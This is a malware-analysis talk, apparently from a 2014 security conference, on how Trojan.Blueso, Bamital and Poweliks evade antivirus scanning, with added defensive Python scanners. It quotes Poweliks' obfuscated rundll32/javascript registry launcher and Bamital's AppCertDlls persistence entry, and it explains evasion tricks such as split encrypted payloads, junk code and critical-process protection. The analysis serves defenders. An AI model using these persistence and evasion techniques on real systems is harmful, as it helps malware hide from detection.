How malware avoids Anti-Virus scanning

Hiroshi Shinotsuka
Threat Analysis Engineer

Self-introduction
Copyright © 2014 Symantec Corporation

•  Threat analysis engineer in Symantec.
•  Analyze suspicious files and create Anti-Virus signatures.
•  Provide detailed technical descriptions to customers on demand.
•  Publicly provide malware-related information.

24 hours x 365 days

Attacker's techniques to avoid detection

1)  Store decryption key and data in separate files
2)  Large amount of junk code
3)  Process protection
4)  Store malicious code outside of files (fileless malware)

Trojan.Blueso detection
[Chart: Trojan.Blueso detections per month, August to November; vertical axis 0 to 35,000]

Trojan.Blueso file structure
RAR self-extracting file (13 MB) containing:
  - AutoIt executable file
  - Decryption code (script file)
  - Decryption key (configuration file)
  - Encrypted code

AutoIt is a programming language for the Microsoft Windows platform. The AutoIt syntax is very similar to that of the BASIC programming language, and it is designed to automate the Windows GUI.

The RAR self-extracting file drops 4 files, then it executes the AutoIt script.
Decrypted code: Blueso injects Backdoor.Trojan.

[Diagram: AutoIt executable (Code, Decryption key, Encrypted code) -> Decryption -> part of the decrypted code in a Legitimate Windows Process -> decrypted code in an Internet Explorer process; label "Watch Dog monitor"]

[Diagram: File deleted -> Create File; Process deleted -> Create Process -> Inject]

Trojan.Blueso creates the file/registry entry/process again if Antivirus deletes it.

Attacker's techniques to avoid detection

1)  Store decryption key and data in separate files
2)  Large amount of junk code
3)  Process protection
4)  Store malicious code outside of files (fileless malware)

Traditional sample
Packer / Self update

•  Harder to detect encrypted files.
•  Traditional samples stored all information in a single file.

[Diagram: single file (Code, Decryption key, Encrypted code) -> single file (Code, Decrypted malicious code)]

New technique to avoid detection
Traditionally, malware saved its decrypted image to a file and executed it. The Antivirus scanner detects the malware when it saves the decrypted image onto the disk.

The new technique is to inject the decrypted image into a newly started process and execute it there, in order to avoid detection by the file scan.

[Diagram: AutoIt executable (Code, Decryption key, Encrypted code) -> decrypt in memory -> Decrypted malicious code injected into a Legitimate Windows Process]

File detail
[Diagram: the three parts, Code, Decryption key and Encrypted code, each in its own file]

AntiVirus scanner scans each file.

Why the attacker splits malware into four separate files
[Diagram: each dropped file (AutoIt executable, Decryption code, Decryption key / Setting file, Encrypted code) is scanned separately: Scan, Scan, Scan, Scan]

What does this mean?

•  Hiding malicious code by encrypting it.
•  Store the code, the decryption key and the encrypted code in separate files.
•  The Antivirus scanner can't determine that the 'encrypted code' is a malicious file.
•  The Antivirus scanner can't detect the file without understanding the relationships between multiple files.

Attacker's techniques to avoid detection

1)  Store decryption key and data in separate files
2)  Large amount of junk code
3)  Process protection
4)  Store malicious code outside of files (fileless malware)

Code (beginning of file)
[Screenshot: beginning of the script; a TAB character is replaced with a 1-byte string]

You only see junk comment lines!

Code (Sample 1)
Code (Sample 2)
Code
Finally, at line 23670 (16 MB into the file), the important code is reached.

87476 lines of AutoIt script code.
Only 900 lines without comment lines.
Only 1% is important code.

Antivirus scan method
•  The Antivirus scanner needs to keep a balance between detection and performance.
•  The Antivirus scanner first determines the file type and starts the file scan based on the detected file type.

[Diagram: file headers identify an Executable file, a ZIP file, a JPEG file]

No special file structure in a text file/script file.

Script files have no file header, which means the files have no special file structure.
The Antivirus scanner needs to run a partial scan and determine what the file is.
It is very difficult to keep scan performance if a malicious script contains so much comment/junk code.

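Added example (not code from the talk) of the pre-processing a scanner needs before it can afford to look at such a script: an AutoIt-aware normaliser that drops ';' line comments and #cs/#ce comment blocks, measures how much of the file is junk, and applies the loader pattern only to the lines that would actually execute. The sample script and the 0.9 junk threshold are constructed for the example.

```python
import re

# Constructed AutoIt fragment shaped like the slides describe: a few real
# statements buried under comment lines and a #cs/#ce comment block.
SAMPLE_SCRIPT = ("; " + "junk " * 8 + "\n") * 40 + (
    "#cs\n" + "  filler text that is never executed\n" * 30 + "#ce\n"
    "$key = FileRead('key.cfg')\n"
    "; another decoy line\n"
    "$blob = FileRead('data.bin')\n"
    "$code = Decrypt($blob, $key)  ; trailing comment\n"
    "Inject($code)\n"
)

# AutoIt block comments: "#cs" / "#comments-start" ... "#ce" / "#comments-end"
BLOCK_START = re.compile(r"^\s*#(cs|comments-start)\b", re.IGNORECASE)
BLOCK_END = re.compile(r"^\s*#(ce|comments-end)\b", re.IGNORECASE)


def _strip_trailing_comment(line: str) -> str:
    """Drop a ';' comment, but not a ';' that sits inside a string literal."""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            return line[:i]
    return line


def strip_autoit_comments(source: str) -> list:
    """Return only the lines the AutoIt interpreter would actually execute."""
    kept = []
    in_block = False
    for line in source.splitlines():
        if in_block:
            if BLOCK_END.match(line):
                in_block = False
            continue
        if BLOCK_START.match(line):
            in_block = True
            continue
        code = _strip_trailing_comment(line).strip()
        if code:
            kept.append(code)
    return kept


def junk_ratio(source: str) -> float:
    """Fraction of lines carrying no executable code (1.0 means all junk)."""
    total = len(source.splitlines())
    if total == 0:
        return 0.0
    return 1.0 - len(strip_autoit_comments(source)) / total


def triage(source: str, junk_threshold: float = 0.9) -> dict:
    """Normalise first, then match the loader pattern on executable lines only."""
    code = strip_autoit_comments(source)
    joined = "\n".join(code)
    ratio = junk_ratio(source)
    return {
        "total_lines": len(source.splitlines()),
        "code_lines": len(code),
        "junk_ratio": round(ratio, 3),
        "suspicious_junk": ratio >= junk_threshold,   # the talk's sample is ~99% junk
        "loader_pattern": all(t in joined for t in ("FileRead(", "Decrypt(", "Inject(")),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

The normalised view is what a signature is cheaply matched against; the junk ratio itself is a usable heuristic, since the talk's sample is 87476 lines of which only about 900 execute.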
Attacker's techniques to avoid detection

1)  Store decryption key and data in separate files
2)  Large amount of junk code
3)  Process protection
4)  Store malicious code outside of files (fileless malware)

How does Blueso start and protect itself?
[Diagram: AutoIt executable (Code, Decryption key, Encrypted code) -> Decryption -> Legitimate Windows Process -> Internet Explorer process; annotated "Malware !!", "Malware ??", "What is wrong ??"]

Process protection mechanism
1)  Terminate Internet Explorer
    -> The malicious code injected into the Legitimate Windows Process executes it again

2)  Terminate the Legitimate Windows Process
    -> The script running on AutoIt executes it again

3)  Terminate AutoIt?
    -> The AutoIt executable is marked as an essential process for the Windows system by using the undocumented API NtSetInformationProcess.
    As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem.
    -> Blue Screen Of Death!!

Blue Screen Of Death
Attacker's techniques to avoid detection

1)  Store decryption key and data in separate files
2)  Large amount of junk code
3)  Process protection
4)  Store malicious code outside of files (fileless malware)

Example of malware storing code/data in an irregular place (Bamital)
Set a registry entry to start the code when Windows restarts.

HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls
"AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"

Because of the analysis already performed, xblscp.dll is determined to be a malicious file.
Strictly speaking, does this file have malicious code in it?

Example of malware storing code/data in an irregular place (Bamital) 2
How it works

•  Allocate memory
•  Store data from the registry into the allocated memory
•  Call the allocated memory

The Antivirus scanner does not know the data format. The data is written in the registry.
Other malware uses the same technique with a file.

Example of malware storing code/data in an irregular place (Poweliks)
Trojan.Poweliks writes a Windows PowerShell script to the registry.
You can see that this registry entry may execute encrypted JavaScript.
The encrypted code that should be decrypted is stored in a different registry entry.

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) =
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))

"a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@"

Conclusion
•  Attackers discover new techniques every day.
•  Attackers employ techniques to make malware removal difficult.
•  File-based scanning is no longer effective.
•  Multi-layered security is becoming more important.

Q & A
Thank you!

Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.

Hiroshi Shinotsuka

 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

CODE BLUE 2014: How to Avoid the Detection by Malware, by HIROSHI SHINOTSUKA

  • 1. How malware avoids Anti-Virus scanning. Hiroshi Shinotsuka, Threat Analysis Engineer
  • 2. Self-introduction. Copyright © 2014 Symantec Corporation.
    • Threat analysis engineer at Symantec.
    • Analyze suspicious files and create Anti-Virus signatures.
    • Provide detailed technical descriptions to customers on demand.
    • Publicly provide malware-related information.
  • 3. 24 hours x 365 days
  • 4. Attacker's techniques to avoid detection:
    1. Store decryption key and data in separate files
    2. Large amount of junk code
    3. Process protection
    4. Store malicious code outside of files (fileless malware)
  • 5. Trojan.Blueso detection. (Chart: monthly Trojan.Blueso detections for August, September, October and November; y-axis from 0 to 35,000.)
  • 6. Trojan.Blueso file structure. RAR self-extracting file, 13 MB, containing: AutoIt executable file; decryption code (script file); decryption key (configuration file); encrypted code. AutoIt is a programming language for the Microsoft Windows platform. The AutoIt syntax is very similar to that of the BASIC programming language and is designed to automate the Windows GUI. The RAR self-extracting file drops the 4 files, then executes the AutoIt script.
  • 7. Blueso injects Backdoor.Trojan. (Diagram: the AutoIt executable holds the code, the decryption key and the encrypted code; after decryption the decrypted code is injected into a legitimate Windows process, and part of the decrypted code into an Internet Explorer process.)
  • 8. Watch Dog monitor. (Diagram: Create File, Create Process, Inject; File deleted, Process deleted.) Trojan.Blueso makes the file/registry/process again if Antivirus deletes it.
  • 9. Attacker's techniques to avoid detection (agenda slide, item 1: Store decryption key and data in separate files).
  • 10. Traditional sample. Packer / Self update.
    • Harder to detect encrypted files.
    • Traditional samples stored all information in a single file.
    (Diagram: Code, Decryption key, Encrypted code -> Code, Decrypted malicious code.)
  • 11. New technique to avoid detection. Traditionally, malware saved its decrypted image to a file and executed it, and an antivirus scanner detected the malware when the decrypted image was saved onto the disk. The new technique is to inject the decrypted image into a new running process and execute it there, in order to avoid detection by file scan. (Diagram: the AutoIt executable holds code, decryption key and encrypted code; it decrypts in memory, and the decrypted malicious code runs inside a legitimate Windows process.)
  • 12. File detail. (Code, Decryption key, Encrypted code.)
  • 13. Why the attacker splits malware into four separate files. An Anti-Virus scanner scans each file on its own: AutoIt executable (scan), decryption code (scan), decryption key / setting file (scan), encrypted code (scan).
  • 14. What does this mean?
    • Hiding malicious code by encrypting it.
    • Store the code, the decryption key and the encrypted code in separate files.
    • An antivirus scanner can't determine the 'encrypted code' to be a malicious file.
    • An antivirus scanner can't detect the file without understanding the relationships between multiple files.
  • 15. Attacker's techniques to avoid detection (agenda slide, item 2: Large amount of junk code).
  • 16. Code (beginning of file). (Screenshot; 1 TAB character is replaced with a 1-byte string.) You only see junk comment lines!
  • 17. Code (Sample 1). (Screenshot.)
  • 18. Code (Sample 2). (Screenshot.)
  • 19. Code. Finally, at line 23670 (16 MB in size), the important code is reached. 87476 lines of AutoIt script code; only 900 lines without the comment lines; only 1% important code.
  • 20. Antivirus scan method.
    • An antivirus scanner needs to balance detection and performance.
    • An antivirus scanner first determines the file type and starts the file scan based on the detected file type. (Executable file, ZIP file, JPEG file.)
  • 21. No special file structure in text files/script files. Script files have no file header, which means the files have no special file structure. An antivirus scanner needs to run a partial scan and determine what the file is. It is very difficult to keep scan performance if a malicious script has so much comment/junk code.
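An added example (my own Python, not code from the talk) of the triage step a scanner or an analyst has to perform on a script like the one on slides 16 to 21 before anything can match: strip AutoIt's ';' line comments and #cs/#ce (#comments-start/#comments-end) blocks and measure how much real code is left. The sample script is constructed; the real Blueso script is not reproduced.

```python
import re

# Constructed sample imitating the layout on slides 16 to 19 (not the real Blueso script).
SAMPLE_SCRIPT = """; junk comment line 1
; junk comment line 2
#cs
  block of junk text that AutoIt never executes
#ce
Global $key = IniRead(@ScriptDir & "\\cfg.ini", "main", "k", "")  ; trailing comment
Global $data = FileRead(@ScriptDir & "\\data.bin")
; junk comment line 3
Run(@ScriptDir & "\\host.exe")
"""

BLOCK_START = re.compile(r"^#(cs|comments-start)\b", re.IGNORECASE)
BLOCK_END = re.compile(r"^#(ce|comments-end)\b", re.IGNORECASE)

def _cut_trailing_comment(line):
    # Drop a ';' comment but ignore ';' inside AutoIt string literals ("..." or '...').
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch == ";":
            return line[:i].rstrip()
    return line

def strip_autoit_comments(script):
    # Return only the lines AutoIt would execute, in order (comment-only lines dropped).
    code, depth = [], 0
    for raw in script.splitlines():
        line = raw.strip()
        if BLOCK_START.match(line):
            depth += 1                      # #cs blocks may be nested
        elif BLOCK_END.match(line):
            depth = max(0, depth - 1)
        elif not depth and line and not line.startswith(";"):
            code.append(_cut_trailing_comment(line))
    return code

def junk_ratio(script):
    # Summarise how much of the script is real code (slide 19: 900 of 87476 lines).
    total = len(script.splitlines())
    code = len(strip_autoit_comments(script))
    return {"total_lines": total, "code_lines": code, "code_ratio": code / total if total else 0.0}
```

On the constructed sample 3 of 9 lines survive; on the script described in the talk the same ratio is about 1%, which is why a signature written against the comment-free body is more robust than one keyed on the file's first bytes.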
  • 22. Attacker's techniques to avoid detection (agenda slide, item 3: Process protection).
  • 23. How does Blueso start and protect itself? (Diagram: the AutoIt executable holds code, decryption key and encrypted code; decryption; legitimate Windows process; Internet Explorer process. "Malware!!", "Malware??", "What is wrong??")
  • 24. Process protection mechanism.
    1) Terminate Internet Explorer -> the malicious code injected into the legitimate Windows process executes it again.
    2) Terminate the legitimate Windows process -> the script running on AutoIt executes it again.
    3) Terminate AutoIt? -> The AutoIt executable is handled as an essential process for the Windows system by using the undocumented API NtSetInformationProcess. As soon as AutoIt is terminated, Windows treats it as an unrecoverable critical problem -> Blue Screen Of Death!!
  • 25. Blue Screen Of Death. (Screenshot.)
  • 26. Attacker's techniques to avoid detection (agenda slide, item 4: Store malicious code outside of files (fileless malware)).
  • 27. Example of malware storing code/data in an irregular place (Bamital). A registry entry is set to start code when Windows restarts:
    HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\Session Manager\AppCertDlls "AppSecDll" = "%USER_Profile%\Local Settings\Application Data\Windows Server\xblscp.dll"
    Because of the analysis already performed, xblscp.dll is determined to be a malicious file. Strictly speaking, does this file have malicious code in it?
  • 28. Example of malware storing code/data in an irregular place (Bamital) 2. How it works:
    • Allocate memory.
    • Store the data from the registry into the allocated memory.
    • Call the allocated memory.
    The antivirus scanner does not know the data rule; the data is written in the registry. Another malware uses the same technique with a file.
  • 29. Example of malware storing code/data in an irregular place (Poweliks). Trojan.Poweliks writes a Windows PowerShell script to the registry. You can find this registry entry, which may execute encrypted JavaScript. The encrypted code that should be decrypted is in a different registry entry.
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\(Default) = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/ S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*, (=0tdsjqu?(*".replace(/./g,function(_){return %20String.fromCharCode(_.charCodeAt()-1);}))
    "a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@
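An added example (my own Python, not from the talk) that scans an exported .reg file for the two persistence locations on slides 27 and 29, an AppCertDlls DLL and a CLSID LocalServer32 default value that runs rundll32.exe with a javascript: URL, and undoes the charCodeAt()-1 obfuscation so the real script can be read. The .reg content is constructed; the eval() payload and the "a" blob are placeholders, not the real Poweliks data.

```python
import re

# Constructed .reg export: AppCertDlls value and CLSID path are the ones quoted on slides 27 and 29; eval() payload and "a" blob are placeholders.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"AppSecDll"="%USER_Profile%\\Local Settings\\Application Data\\Windows Server\\xblscp.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]
@="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"epdvnfou/xsjuf)(ifmmp(*\".replace(/./g,function(_){return String.fromCharCode(_.charCodeAt()-1);}))"
"a"="#@~^PLACEHOLDER_ENCODED_BLOB==^#~@"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\LocalServer32]
@="C:\\Program Files\\Vendor\\app.exe"
'''

VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=("(?:[^"\\]|\\.)*")\s*$')
# The decode stub shown on slide 29: eval("<payload>".replace(/./g, ...charCodeAt()-N...))
EVAL_RE = re.compile(r'eval\("((?:[^"\\]|\\.)*)"\.replace\(/\./g,\s*function\(_\)\{return\s*(?:%20)?'
                     r'String\.fromCharCode\(_\.charCodeAt\(\)-(\d+)\);?\}\)\)')

def _unq(quoted):  # strip the surrounding quotes and the .reg backslash escapes
    return re.sub(r"\\(.)", r"\1", quoted[1:-1])

def parse_reg(text):
    # Return (key, value name, string data) for every REG_SZ line of a .reg export.
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := VALUE_RE.match(line)):
            name = "(Default)" if m.group(1) == "@" else _unq(m.group(1))
            entries.append((key, name, _unq(m.group(2))))
    return entries

def decode_shift(payload, shift):
    # Undo the per-character +shift obfuscation (charCodeAt()-shift in the slide's stub).
    return "".join(chr(ord(c) - shift) for c in payload)

def scan_reg(text):
    # Flag the two persistence locations from the talk plus Windows Script Encoder blobs.
    findings = []
    for key, name, value in parse_reg(text):
        low_key, low_val = key.lower(), value.lower()
        if low_key.endswith("\\appcertdlls"):  # Bamital: DLL path stored under AppCertDlls
            findings.append({"key": key, "name": name, "kind": "appcertdlls-dll", "detail": value})
        elif low_key.endswith("\\localserver32") and "rundll32" in low_val and "javascript:" in low_val:
            m = EVAL_RE.search(value)  # Poweliks: the COM server is an inline script
            detail = decode_shift(m.group(1), int(m.group(2))) if m else value
            findings.append({"key": key, "name": name, "kind": "rundll32-javascript", "detail": detail})
        elif value.startswith("#@~^"):  # Windows Script Encoder header
            findings.append({"key": key, "name": name, "kind": "encoded-script", "detail": value[:16]})
    return findings
```

The clean LocalServer32 entry pointing at a normal executable produces no finding, which is the point of keying on rundll32 plus javascript: rather than on LocalServer32 alone.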
  • 30. Conclusion.
    • Attackers discover new techniques every day.
    • Attackers employ techniques to make malware removal difficult.
    • File-based scanning is no longer effective.
    • Multi-layered security is becoming more important.
  • 31. Q & A
  • 32. Thank you! Copyright © 2014 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. Hiroshi Shinotsuka

Editor's Notes

  1. Tip: simple SEO adjustments can make your presentation more discoverable. Read this PDF for best practices:  http://seo.ges.symantec.com/seo-best-practices-for-file-optimization.pdf
  2. Loading the 32 MB AutoIt script file into the Notepad that ships with Windows took 4 seconds. If, for example, double-clicking a file to run it took 4 seconds before it actually ran... nobody would wait!